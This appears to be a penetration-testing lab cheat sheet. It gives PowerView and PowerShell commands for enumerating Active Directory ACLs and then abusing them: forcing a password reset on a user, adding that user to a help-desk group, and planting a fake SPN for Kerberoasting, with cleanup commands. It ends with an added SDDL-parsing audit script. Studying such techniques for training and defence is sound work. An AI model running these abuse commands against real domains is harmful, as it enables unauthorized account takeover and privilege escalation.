ACL Enumeration & Tactics

1. Find Object ACLs in Windows Domain

Command:

Find-InterestingDomainAcl
  • Description: PowerView function used to find object ACLs in the target Windows domain that grant modification rights to non-built-in principals, run from a Windows-based host.


2. Import PowerView and Retrieve User SID

Command:

Import-Module .\PowerView.ps1
$sid = Convert-NameToSid wley
  • Description: Used to import PowerView and retrieve the SID of a specific user account (wley) from a Windows-based host.


3. Find Domain Objects a User Has Rights Over

Command:

Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
  • Description: Used to find all Windows domain objects that the user has rights over by matching the SecurityIdentifier of each ACE against the user's SID.


4. Perform Reverse Search & Map GUID

Command:

$guid = "00299570-246d-11d0-a768-00aa006e0529"
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ?{$_.rightsGuid -eq $guid} | fl
  • Description: Used to perform a reverse search from a Windows-based host: it queries the ControlAccessRight objects in the Extended-Rights container and maps the GUID value to the extended right it represents.


5. Discover Domain Object ACL Based on GUID

Command:

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
  • Description: Used to discover the domain objects the user's SID has rights over, with -ResolveGUIDs resolving the GUIDs in the ACEs to their readable right names.


6. Discover User Accounts in Domain & Save to File

Command:

Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
  • Description: Used to list the user accounts in the target Windows domain and write their SamAccountName values to a text file (ad_users.txt).


7. Retrieve ACL Information for Each Domain User

Command:

foreach($line in [System.IO.File]::ReadLines("C:\Users\htbstudent\Desktop\ad_users.txt")) {
    get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}
}
  • Description: Loops through the list of domain users from ad_users.txt, retrieves their ACL information, and filters results for INLANEFREIGHT\wley.


8. Create a PSCredential Object

Command:

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
  • Description: Used to create a PSCredential object for the INLANEFREIGHT\wley account from the SecureString password.


9. Create a SecureString Object

Command:

$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
  • Description: Used to create a SecureString object holding the new password that will be set on the damundsen account.


10. Change a User’s Password

Command:

Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
  • Description: PowerView command to change the password of a specific user (damundsen) on a target Windows domain.


11. View Members of a Security Group

Command:

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members
  • Description: Used to view the members of a target security group (Help Desk Level 1).


12. Add a User to a Security Group

Command:

Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose
  • Description: Adds a specific user (damundsen) to a security group (Help Desk Level 1).


13. View Only Usernames of Security Group Members

Command:

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
  • Description: Retrieves the members of Help Desk Level 1 security group, displaying only their usernames.


14. Create a Fake Service Principal Name (SPN)

Command:

Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
  • Description: Creates a fake Service Principal Name for a specific user (adunn).


15. Remove a Fake Service Principal Name (SPN)

Command:

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose
  • Description: Removes a previously created fake Service Principal Name.


16. Remove a User from a Security Group

Command:

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose
  • Description: Removes a specific user (damundsen) from the security group Help Desk Level 1.


17. Convert an SDDL String into Readable Format

Command:

ConvertFrom-SddlString
  • Description: PowerShell cmdlet used to convert an SDDL string into a readable format.
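
An added example, not part of the original cheat sheet, that combines the SDDL parsing of step 17 with the GUID mapping of step 4 on a constructed SDDL string, so it runs in PowerShell without a domain: it parses the string with the .NET RawSecurityDescriptor class and reports the allow ACEs that carry modification rights. The SIDs, the local GUID lookup table and the set of "modification" bits are assumptions.

```powershell
# Constructed SDDL string (not taken from a real domain): Builtin Administrators own the
# object; one constructed domain SID holds GenericAll, one holds only the extended right
# with the GUID from step 4, and one can only read properties (RP).
$Sddl = 'O:BAG:BAD:(A;;GA;;;S-1-5-21-3842939050-3880317879-2865463114-1111)' +
        '(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-1112)' +
        '(A;;RP;;;S-1-5-21-3842939050-3880317879-2865463114-1113)'

# Hypothetical local lookup table for extended-right GUIDs; during a real review you would
# fill it from the Extended-Rights container using the Get-ADObject query shown in step 4.
$RightsGuid = @{
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
}

# Access-mask bits treated as "can modify the object" (assumption: GenericAll, GenericWrite,
# WriteDacl, WriteOwner, WriteProperty, ExtendedRight, Self). ACEs read from AD usually
# carry the expanded specific bits (e.g. 0xF01FF) rather than GA/GW, which this mask also hits.
$ModifyBits = 0x10000000 -bor 0x40000000 -bor 0x40000 -bor 0x80000 -bor 0x20 -bor 0x100 -bor 0x8

function Get-ModifyingAce {
    param([Parameter(Mandatory)][string]$SddlString)

    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($SddlString)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Deny ACEs grant nothing, so only allow ACEs are reviewed
        if ($ace.AceQualifier -ne [System.Security.AccessControl.AceQualifier]::AccessAllowed) { continue }
        if (($ace.AccessMask -band $ModifyBits) -eq 0) { continue }

        # Object ACEs scope the right to a GUID; resolve it like step 4 does, or flag it for lookup
        $right = 'n/a'
        if ($ace -is [System.Security.AccessControl.ObjectAce] -and
            $ace.ObjectAceFlags.HasFlag([System.Security.AccessControl.ObjectAceFlags]::ObjectAceTypePresent)) {
            $g = $ace.ObjectAceType.ToString()
            $right = if ($RightsGuid.ContainsKey($g)) { $RightsGuid[$g] } else { "unknown GUID $g" }
        }

        [pscustomobject]@{
            SecurityIdentifier = $ace.SecurityIdentifier.Value
            AccessMask         = ('0x{0:X}' -f $ace.AccessMask)
            ExtendedRight      = $right
        }
    }
}

# Expected: the ...-1111 (GenericAll) and ...-1112 (User-Force-Change-Password) ACEs are
# listed; the read-only ...-1113 ACE is not.
Get-ModifyingAce -SddlString $Sddl | Format-Table -AutoSize
```

To review a live object, feed it the SDDL from (Get-Acl "AD:\<distinguishedName>").Sddl, which is the same string ConvertFrom-SddlString in step 17 renders.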
